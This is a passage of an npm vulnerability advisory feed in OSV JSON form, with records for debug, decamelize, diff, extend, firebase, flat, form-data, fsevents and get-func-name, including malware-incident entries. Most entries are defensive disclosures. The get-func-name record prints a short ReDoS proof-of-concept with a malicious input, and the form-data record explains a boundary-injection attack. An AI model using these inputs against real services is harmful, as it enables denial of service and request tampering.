"type": "WEB", "url": "https://github.com/github/advisory-database/issues/6099" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-8mgj-vmr8-frr6" }, { "type": "WEB", "url": "https://github.com/debug-js/debug/security/advisories/GHSA-4x49-vf9v-38px" } ], "database_specific": { "malicious-packages-origins": [ { "id": "GHSA-8mgj-vmr8-frr6", "import_time": "2025-09-09T00:35:48.408037926Z", "modified_time": "2025-09-08T17:54:47Z", "sha256": "558d1dda312e85212121f4ed15340349f780f5e40d6685c3687648bbb2924381", "source": "ghsa-malware", "versions": [ "4.4.2" ] }, { "id": "GHSA-8mgj-vmr8-frr6", "import_time": "2025-09-10T00:34:05.220545432Z", "modified_time": "2025-09-08T17:54:47Z", "sha256": 
"8107bf621a06423d1aae59bd505317ddf2bb8b03ebd71b4a35ce7a0059cad82a", "source": "ghsa-malware", "versions": [ "4.4.2" ] }, { "id": "GHSA-8mgj-vmr8-frr6", "import_time": "2025-09-11T00:34:35.461493997Z", "modified_time": "2025-09-10T17:47:46Z", "sha256": "d2b85998dbc6f082e6c96883e10d26afc54fa634507ab7c04adc926f6fc21de5", "source": "ghsa-malware", "versions": [ "4.4.2" ] }, { "id": "GHSA-8mgj-vmr8-frr6", "import_time": "2025-09-12T00:33:58.045928418Z", "modified_time": "2025-09-10T17:47:46Z", "sha256": "a55920f514ec4e15d3d2bdf89455777f247a624a1a1acf4f909726b3b6514c46", "source": "ghsa-malware", "versions": [ "4.4.2" ] }, { "id": "GHSA-8mgj-vmr8-frr6", "import_time": "2025-09-16T00:34:25.612039797Z", "modified_time": "2025-09-15T23:53:26Z", "sha256": "3bb0e19fac14a7d83fd61d2fc633bedf670deade726ba1a414db1a20f2f85ff3", "source": "ghsa-malware", "versions": [ "4.4.2" ] }, { "id": "GHSA-8mgj-vmr8-frr6", "import_time": "2025-09-17T00:07:09.274173202Z", "modified_time": "2025-09-15T23:53:26Z", "sha256": "55de988936dbe50449ae4dddd6b0bb821bde8f055aaea6e92f61f7d19958b212", "source": "ghsa-malware", "versions": [ "4.4.2" ] }, { "id": "GHSA-8mgj-vmr8-frr6", "import_time": "2025-09-17T00:34:59.109596052Z", "modified_time": "2025-09-15T23:53:26Z", "sha256": "e905a7ba17420439ee063d451043a50b951d28a69bfe4bc90c4f8350c2a26c37", "source": "ghsa-malware", "versions": [ "4.4.2" ] } ] }, "credits": [ { "name": "Amazon Inspector", "contact": [ "actran@amazon.com" ], "type": "FINDER" } ] }, { "schema_version": "1.7.3", "id": "GHSA-q5c4-39f5-m68j", "published": "2018-07-24T20:00:17Z", "modified": "2023-11-08T03:59:00.254876Z", "aliases": [ "CVE-2017-16023" ], "summary": "Regular Expression Denial of Service in decamelize", "details": "Affected versions of `decamelize` are susceptible to a denial of service vulnerability when user input is passed directly into `decamelize`.\n\n\n\n\n## Recommendation\n\nUpdate to version 1.1.2 or later.", "affected": [ { "package": { "name": "decamelize", 
"ecosystem": "npm", "purl": "pkg:npm/decamelize" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.1.0" }, { "fixed": "1.1.2" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.1.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/07/GHSA-q5c4-39f5-m68j/GHSA-q5c4-39f5-m68j.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16023" }, { "type": "WEB", "url": "https://github.com/sindresorhus/decamelize/issues/5" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-q5c4-39f5-m68j" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/308" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:51:05Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-h6ch-v84p-w6p9", "published": "2019-06-13T18:58:54Z", "modified": "2021-02-24T19:27:02Z", "related": [ "CGA-5cqv-mm6m-mf38", "CGA-5mc2-7mmg-hm4f", "CGA-6292-xfg3-c39h", "CGA-c4qh-jfrh-49m7", "CGA-f5r7-qrx9-rxrx", "CGA-v24c-cq4m-759w", "CGA-v9cq-gwgg-6x89", "CGA-vrj4-44qq-4856" ], "summary": "Regular Expression Denial of Service (ReDoS)", "details": "A vulnerability was found in diff before v3.5.0, the affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks.", "affected": [ { "package": { "name": "diff", "ecosystem": "npm", "purl": "pkg:npm/diff" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "3.5.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/06/GHSA-h6ch-v84p-w6p9/GHSA-h6ch-v84p-w6p9.json" } } ], "references": [ { "type": "WEB", "url": 
"https://github.com/kpdecker/jsdiff/commit/2aec4298639bf30fb88a00b356bf404d3551b8c0" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1552148" }, { "type": "WEB", "url": "https://snyk.io/vuln/npm:diff:20180305" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/1631" }, { "type": "WEB", "url": "https://www.whitesourcesoftware.com/vulnerability-database/WS-2018-0590" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2019-06-13T18:54:38Z", "nvd_published_at": null, "severity": "HIGH" } }, { "schema_version": "1.7.3", "id": "GHSA-qrmc-fj45-qfc2", "published": "2019-02-07T18:03:28Z", "modified": "2023-11-08T04:00:01.054529Z", "aliases": [ "CVE-2018-16492" ], "summary": "Prototype Pollution in extend", "details": "Versions of `extend` prior to 3.0.2 (for 3.x) and 2.0.2 (for 2.x) are vulnerable to Prototype Pollution. The `extend()` function allows attackers to modify the prototype of Object causing the addition or modification of an existing property that will exist on all objects.\n\n\n\n\n## Recommendation\n\nIf you're using `extend` 3.x upgrade to 3.0.2 or later.\nIf you're using `extend` 2.x upgrade to 2.0.2 or later.", "affected": [ { "package": { "name": "extend", "ecosystem": "npm", "purl": "pkg:npm/extend" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.0.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/02/GHSA-qrmc-fj45-qfc2/GHSA-qrmc-fj45-qfc2.json" } }, { "package": { "name": "extend", "ecosystem": "npm", "purl": "pkg:npm/extend" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.0.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/02/GHSA-qrmc-fj45-qfc2/GHSA-qrmc-fj45-qfc2.json" } } ], "references": [ { "type": "ADVISORY", "url": 
"https://nvd.nist.gov/vuln/detail/CVE-2018-16492" }, { "type": "WEB", "url": "https://hackerone.com/reports/381185" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-qrmc-fj45-qfc2" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/996" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:52:44Z", "nvd_published_at": null, "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-3wf4-68gx-mph8", "published": "2024-11-18T12:30:42Z", "modified": "2025-07-23T22:12:58Z", "aliases": [ "CVE-2024-11023" ], "summary": "Firebase JavaScript SDK allows attackers to manipulate the \"_authTokenSyncURL\" to point to their own server", "details": "Firebase JavaScript SDK utilizes a \"FIREBASE_DEFAULTS\" cookie to store configuration data, including an \"_authTokenSyncURL\" field used for session synchronization. If this cookie field is preset via an attacker by any other method, the attacker can manipulate the \"_authTokenSyncURL\" to point to their own server and it would allow am actor to capture user session data transmitted by the SDK. 
We recommend upgrading Firebase JS SDK at least to 10.9.0.", "affected": [ { "package": { "name": "firebase", "ecosystem": "npm", "purl": "pkg:npm/firebase" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "10.9.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/11/GHSA-3wf4-68gx-mph8/GHSA-3wf4-68gx-mph8.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-11023" }, { "type": "WEB", "url": "https://github.com/firebase/firebase-js-sdk/pull/8056" }, { "type": "WEB", "url": "https://github.com/firebase/firebase-js-sdk/commit/245dd26e19b6c16aca7e1b7e597ed5784c2984ba" }, { "type": "WEB", "url": "https://firebase.google.com/support/release-notes/js#version_1090_-_march_14_2024" }, { "type": "PACKAGE", "url": "https://github.com/firebase/firebase-js-sdk" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2024-11-18T20:04:30Z", "nvd_published_at": "2024-11-18T11:15:05Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:A/VC:L/VI:L/VA:L/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ] }, { "schema_version": "1.7.3", "id": "GHSA-2j2x-2gpw-g8fm", "published": "2022-12-25T21:30:22Z", "modified": "2023-11-08T04:03:48.649741Z", "aliases": [ "CVE-2020-36632" ], "summary": "flat vulnerable to Prototype Pollution", "details": "flat helps flatten/unflatten nested Javascript objects. A vulnerability, which was classified as critical, was found in hughsk flat up to 5.0.0. This affects the function unflatten of the file index.js. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). 
It is possible to initiate the attack remotely. Upgrading to version 5.0.1 can address this issue. The name of the patch is 20ef0ef55dfa028caddaedbcb33efbdb04d18e13. It is recommended to upgrade the affected component. The identifier VDB-216777 was assigned to this vulnerability.", "affected": [ { "package": { "name": "flat", "ecosystem": "npm", "purl": "pkg:npm/flat" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "5.0.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-2j2x-2gpw-g8fm/GHSA-2j2x-2gpw-g8fm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36632" }, { "type": "WEB", "url": "https://github.com/hughsk/flat/issues/105" }, { "type": "WEB", "url": "https://github.com/hughsk/flat/pull/106" }, { "type": "WEB", "url": "https://github.com/hughsk/flat/commit/20ef0ef55dfa028caddaedbcb33efbdb04d18e13" }, { "type": "PACKAGE", "url": "https://github.com/hughsk/flat" }, { "type": "WEB", "url": "https://github.com/hughsk/flat/releases/tag/5.0.1" }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.216777" }, { "type": "WEB", "url": "https://vuldb.com/?id.216777" } ], "database_specific": { "cwe_ids": [ "CWE-1321" ], "github_reviewed": true, "github_reviewed_at": "2022-12-30T16:27:14Z", "nvd_published_at": "2022-12-25T20:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-fjxv-7rqg-78g4", "published": "2025-07-21T19:04:54Z", "modified": "2025-11-03T21:34:08Z", "aliases": [ "CVE-2025-7783" ], "related": [ "CGA-35hh-78jw-8mmq", "CGA-9m6x-qcrx-9xfj", "CGA-cvhq-qgx3-vfx9", "CGA-g2fp-rgfq-2hjj", "CGA-h6v7-23w8-2vw8", "CGA-mp9r-pq3p-q3qc", "CGA-pgwm-362h-3mjh", "CGA-qvfw-fcfj-g5xq", "CGA-rvcj-gcgm-25q3", "CGA-xvgg-cqm9-vxh5", "CVE-2025-7783" ], "summary": "form-data uses unsafe random 
function in form-data for choosing boundary", "details": "### Summary\n\nform-data uses `Math.random()` to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker:\n1. can observe other values produced by Math.random in the target application, and\n2. can control one field of a request made using form-data\n\nBecause the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, including those used to generate form-data's boundary value. This allows the attacker to craft a value that contains a boundary value, allowing them to inject additional parameters into the request.\n\nThis is largely the same vulnerability as was [recently found in `undici`](https://hackerone.com/reports/2913312) by [`parrot409`](https://hackerone.com/parrot409?type=user) -- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work.\n\n### Details\n\nThe culprit is this line here: https://github.com/form-data/form-data/blob/426ba9ac440f95d1998dac9a5cd8d738043b048f/lib/form_data.js#L347\n\nAn attacker who is able to predict the output of Math.random() can predict this boundary value, and craft a payload that contains the boundary value, followed by another, fully attacker-controlled field. This is roughly equivalent to any sort of improper escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application to solve for the state of the PRNG. 
However, Math.random() is used in all sorts of places that might be visible to an attacker (including by form-data itself, if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data, such as a user-controlled webhook -- the attacker could observe the boundary values from those requests to observe the Math.random() outputs). A common example would be a `x-request-id` header added by the server. These sorts of headers are often used for distributed tracing, to correlate errors across the frontend and backend. `Math.random()` is a fine place to get these sorts of IDs (in fact, [opentelemetry uses Math.random for this purpose](https://github.com/open-telemetry/opentelemetry-js/blob/2053f0d3a44631ade77ea04f656056a2c8a2ae76/packages/opentelemetry-sdk-trace-base/src/platform/node/RandomIdGenerator.ts#L22))\n\n### PoC\n\nPoC here: https://github.com/benweissmann/CVE-2025-7783-poc\n\nInstructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID). \n\n### Impact\n\nFor an application to be vulnerable, it must:\n- Use `form-data` to send data including user-controlled data to some other system. The attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to this request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending values (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array)\n- Reveal values of Math.random(). 
It's easiest if the attacker can observe multiple sequential values, but more complex math could recover the PRNG state to some degree of confidence with non-sequential values. \n\nIf an application is vulnerable, this allows an attacker to make arbitrary requests to internal systems.", "affected": [ { "package": { "name": "form-data", "ecosystem": "npm", "purl": "pkg:npm/form-data" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.5.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-fjxv-7rqg-78g4/GHSA-fjxv-7rqg-78g4.json" } }, { "package": { "name": "form-data", "ecosystem": "npm", "purl": "pkg:npm/form-data" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.0.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-fjxv-7rqg-78g4/GHSA-fjxv-7rqg-78g4.json" } }, { "package": { "name": "form-data", "ecosystem": "npm", "purl": "pkg:npm/form-data" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.0.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-fjxv-7rqg-78g4/GHSA-fjxv-7rqg-78g4.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/form-data/form-data/security/advisories/GHSA-fjxv-7rqg-78g4" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7783" }, { "type": "WEB", "url": "https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0" }, { "type": "WEB", "url": "https://github.com/benweissmann/CVE-2025-7783-poc" }, { "type": "PACKAGE", "url": "https://github.com/form-data/form-data" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/07/msg00023.html" } ], "database_specific": { "cwe_ids": [ "CWE-330" ], 
"github_reviewed": true, "github_reviewed_at": "2025-07-21T19:04:54Z", "nvd_published_at": "2025-07-18T17:15:44Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-8r6j-v8pm-fqw3", "published": "2023-10-06T21:30:49Z", "modified": "2023-11-08T04:13:38.062107Z", "aliases": [ "CVE-2023-45311" ], "summary": "Code injection in fsevents", "details": "fsevents before 1.2.11 depends on the https://fsevents-binaries.s3-us-west-2.amazonaws.com URL, which might allow an adversary to execute arbitrary code if any JavaScript project (that depends on fsevents) distributes code that was obtained from that URL at a time when it was controlled by an adversary.", "affected": [ { "package": { "name": "fsevents", "ecosystem": "npm", "purl": "pkg:npm/fsevents" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.2.11" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.2.10", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-8r6j-v8pm-fqw3/GHSA-8r6j-v8pm-fqw3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45311" }, { "type": "WEB", "url": "https://github.com/fsevents/fsevents/commit/909af26846834642c81d19f4148afa3b7557b058" }, { "type": "WEB", "url": "https://github.com/atlassian/moo/blob/56ccbdd41b493332bc2cd7a4097a5802594cdb9c/package-lock.json#L1901-L1902" }, { "type": "WEB", "url": "https://github.com/atlassian/react-immutable-proptypes/blob/ddb9fa5194b931bf7528eb4f2c0a8c3434f70edd/package-lock.json#L153" }, { "type": "WEB", "url": "https://github.com/cloudflare/authr/blob/3f6129d97d06e61033a7f237d84e35e678db490f/ts/package-lock.json#L1512" }, { "type": "WEB", "url": 
"https://github.com/cloudflare/hugo-cloudflare-docs/blob/e0f7cfa195af8ef1bfa51a487be7d34ba298ed06/package-lock.json#L494" }, { "type": "WEB", "url": "https://github.com/cloudflare/redux-grim/blob/b652f99f95fb16812336073951adc5c5a93e2c23/package-lock.json#L266-L267" }, { "type": "WEB", "url": "https://github.com/cloudflare/serverless-cloudflare-workers/blob/e95e1e9c9770ed9a3d9480c1fa73e64391268354/package-lock.json#L737" }, { "type": "PACKAGE", "url": "https://github.com/fsevents/fsevents" }, { "type": "WEB", "url": "https://github.com/fsevents/fsevents/compare/v1.2.10...v1.2.11" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-JS-FSEVENTS-5487987" } ], "database_specific": { "cwe_ids": [ "CWE-94" ], "github_reviewed": true, "github_reviewed_at": "2023-10-09T21:35:16Z", "nvd_published_at": "2023-10-06T21:15:10Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "MAL-2023-462", "published": "2023-04-27T19:20:00Z", "modified": "2023-11-08T04:24:32.787594Z", "aliases": [ "GHSA-xv2f-5jw4-v95m" ], "summary": "Malicious code in fsevents (npm)", "details": "\n---\n_-= Per source details. 
Do not edit below this line.=-_\n\n## Source: ghsa-malware (acdc3ae57250fab51aeff6e3938ed40197a1b74eb688a72cd5d7eee0c77a7167)\nThis advisory is intended to inform the npm ecosystem with details to resolve a third-party malware incident that may have impacted your infrastructure if you are directly or transitively dependent on the [fsevents](https://www.npmjs.com/package/fsevents) npm package.\n\n## Overview\n\n[fsevents](https://www.npmjs.com/package/fsevents) v1.0.0 \u003c= v1.2.10 downloaded binary executables that contained unintended code due to an expired cloud storage resource being reclaimed by a third party.\n\n## Details\n\nThe [fsevents npm package](https://www.npmjs.com/package/fsevents) v1.0.0 through v1.2.10 attempts to fetch a pre-built binary executable artifact (fse.node) from cloud storage. If this fetch fails, fsevents v1.x will attempt to build this artifact directly from source.\n\nVersion 1.x of fsevents has been deprecated for several years and as a result the aforementioned cloud storage resource namespace was available for registration. A third party, unrelated to the fsevents maintainers, subsequently claimed this namespace and in April 2023 this third party started serving modified versions of the “fse.node” binary executable artifact to new fsevents v1.x users. \n\nAs of April 27, 2023 the cloud storage resource in question has been indefinitely suspended and is no longer serving binaries.\n\nThe affected cloud storage pre-fetch was [removed](https://github.com/fsevents/fsevents/commit/909af26846834642c81d19f4148afa3b7557b058) in fsevents version 1.2.11.\n\n## Impact\n\nThe impact of the modified versions of fse.node appears to be limited to information gathering. \n\nNote that initial analysis was performed for the modified artifact associated with fsevents v1.2.9, which was distributed as fse-v1.2.9-node-v72-darwin-x64.tar.gz prior to the cloud storage resource being suspended. 
\n\nFor more detailed analysis you may compare a decompilation of the v1.x fse.node artifacts on your systems with the intended fsevents v1.x source as it exists at https://github.com/fsevents/fsevents/tree/v1.x \n\n## How to fix it\n\nIf you are dependent on the deprecated version of fsevents v1.x, the recommended course of action is to upgrade to fsevents v2.x or remove the dependency altogether as currently maintained versions of Node.js no longer require fsevents for file system watching on macOS.\n", "affected": [ { "package": { "name": "fsevents", "ecosystem": "npm", "purl": "pkg:npm/fsevents" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.0.0" }, { "fixed": "1.2.11" } ] } ], "database_specific": { "cwes": [ { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" } ], "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/fsevents/MAL-2023-462.json" } } ], "references": [ { "type": "WEB", "url": "https://www.npmjs.com/package/fsevents" }, { "type": "WEB", "url": "https://github.com/fsevents/fsevents/commit/909af26846834642c81d19f4148afa3b7557b058" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-xv2f-5jw4-v95m" } ], "database_specific": { "malicious-packages-origins": [ { "id": "GHSA-xv2f-5jw4-v95m", "import_time": "2023-07-30T21:58:32.873496549Z", "modified_time": "2023-05-01T15:47:26Z", "ranges": [ { "events": [ { "introduced": "1.0.0" }, { "fixed": "1.2.11" } ], "type": "SEMVER" } ], "sha256": "acdc3ae57250fab51aeff6e3938ed40197a1b74eb688a72cd5d7eee0c77a7167", "source": "ghsa-malware" } ] } }, { "schema_version": "1.7.3", "id": "GHSA-4q6p-r6v2-jvc5", "published": "2023-09-27T20:16:00Z", "modified": "2023-11-08T04:13:31.847974Z", "aliases": [ "CVE-2023-43646" ], "related": [ "CGA-6527-pf2q-fc57", "CVE-2023-43646" ], "summary": "Chaijs/get-func-name vulnerable to ReDoS", "details": "The current regex 
implementation for parsing values in the module is susceptible to excessive backtracking, leading to potential DoS attacks. The regex implementation in question is as follows:\n\n```js\nconst functionNameMatch = /\\s*function(?:\\s|\\s*\\/\\*[^(?:*/)]+\\*\\/\\s*)*([^\\s(/]+)/;\n```\n\nThis vulnerability can be exploited when there is an imbalance in parentheses, which results in excessive backtracking and subsequently increases the CPU load and processing time significantly. This vulnerability can be triggered using the following input:\n\n```js\n'\\t'.repeat(54773) + '\\t/function/i'\n```\n\nHere is a simple PoC code to demonstrate the issue:\n\n```js\nconst protocolre = /\\sfunction(?:\\s|\\s/*[^(?:*\\/)]+*/\\s*)*([^\\(\\/]+)/;\n\nconst startTime = Date.now();\nconst maliciousInput = '\\t'.repeat(54773) + '\\t/function/i'\n\nprotocolre.test(maliciousInput);\n\nconst endTime = Date.now();\n\nconsole.log(\"process time: \", endTime - startTime, \"ms\");\n```", "affected": [ { "package": { "name": "get-func-name", "ecosystem": "npm", "purl": "pkg:npm/get-func-name" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.0.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/09/GHSA-4q6p-r6v2-jvc5/GHSA-4q6p-r6v2-jvc5.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/chaijs/get-func-name/security/advisories/GHSA-4q6p-r6v2-jvc5" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43646" }, { "type": "WEB", "url": "https://github.com/chaijs/get-func-name/commit/f934b228b5e2cb94d6c8576d3aac05493f667c69" }, { "type": "PACKAGE", "url": "https://github.com/chaijs/get-func-name" }, { "type": "WEB", "url": "https://github.com/chaijs/get-func-name/blob/78ad756441a83f3dc203e50f76c113ae3ac017dc/index.js#L15" } ], "database_specific": { "cwe_ids": [ "CWE-1333", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": 
"2023-09-27T20:16:00Z", "nvd_published_at": "2023-09-27T15:19:34Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cj88-88mr-972w", "published": "2022-07-18T17:03:23Z", "modified": "2025-04-14T22:13:25Z", "aliases": [ "BIT-gulp-2021-35065", "CVE-2021-35065" ], "summary": "glob-parent 6.0.0 vulnerable to Regular Expression Denial of Service", "details": "glob-parent 6.0.0 is vulnerable to Regular Expression Denial of Service (ReDoS). This issue is fixed in version 6.0.1.\n\nThis vulnerability is separate from [GHSA-ww39-953v-wcq6](https://github.com/advisories/GHSA-ww39-953v-wcq6).", "affected": [ { "package": { "name": "glob-parent", "ecosystem": "npm", "purl": "pkg:npm/glob-parent" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.0.1" } ] } ], "versions": [ "6.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/07/GHSA-cj88-88mr-972w/GHSA-cj88-88mr-972w.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-35065" }, { "type": "WEB", "url": "https://github.com/opensearch-project/OpenSearch-Dashboards/issues/1103" }, { "type": "WEB", "url": "https://github.com/gulpjs/glob-parent/pull/49" }, { "type": "WEB", "url": "https://github.com/gulpjs/glob-parent/commit/32f6d52663b7addac38d0dff570d8127edf03f47" }, { "type": "WEB", "url": "https://github.com/gulpjs/glob-parent/commit/3e9f04a3b4349db7e1962d87c9a7398cda51f339" }, { "type": "PACKAGE", "url": "https://github.com/gulpjs/glob-parent" }, { "type": "WEB", "url": "https://github.com/gulpjs/glob-parent/releases/tag/v6.0.1" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230214-0010" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-JS-GLOBPARENT-1314294" }, { "type": "WEB", "url": 
"https://www.mend.io/vulnerability-database/CVE-2021-35065" } ], "database_specific": { "cwe_ids": [ "CWE-1333", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2022-07-18T17:03:23Z", "nvd_published_at": "2022-12-26T07:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-ww39-953v-wcq6", "published": "2021-06-07T21:56:34Z", "modified": "2025-01-14T08:57:10.357296Z", "aliases": [ "BIT-gulp-2020-28469", "CVE-2020-28469" ], "summary": "glob-parent vulnerable to Regular Expression Denial of Service in enclosure regex", "details": "This affects the package glob-parent before 5.1.2. The enclosure regex, used to check for strings ending in an enclosure containing a path separator, is vulnerable to Regular Expression Denial of Service.", "affected": [ { "package": { "name": "glob-parent", "ecosystem": "npm", "purl": "pkg:npm/glob-parent" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.0.0" }, { "fixed": "5.1.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-ww39-953v-wcq6/GHSA-ww39-953v-wcq6.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28469" }, { "type": "WEB", "url": "https://github.com/gulpjs/glob-parent/pull/36" }, { "type": "WEB", "url": "https://github.com/gulpjs/glob-parent/pull/36/commits/c6db86422a9731d4f3d332ce4a81c27ea6b0ee46" }, { "type": "WEB", "url": "https://github.com/gulpjs/glob-parent/commit/4a80667c69355c76a572a5892b0f133c8e1f457e" }, { "type": "PACKAGE", "url": "https://github.com/gulpjs/glob-parent" }, { "type": "WEB", "url": "https://github.com/gulpjs/glob-parent/blob/6ce8d11f2f1ed8e80a9526b1dc8cf3aa71f43474/index.js%23L9" }, { "type": "WEB", "url": "https://github.com/gulpjs/glob-parent/releases/tag/v5.1.2" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBES128-1059093" }, { "type": "WEB", 
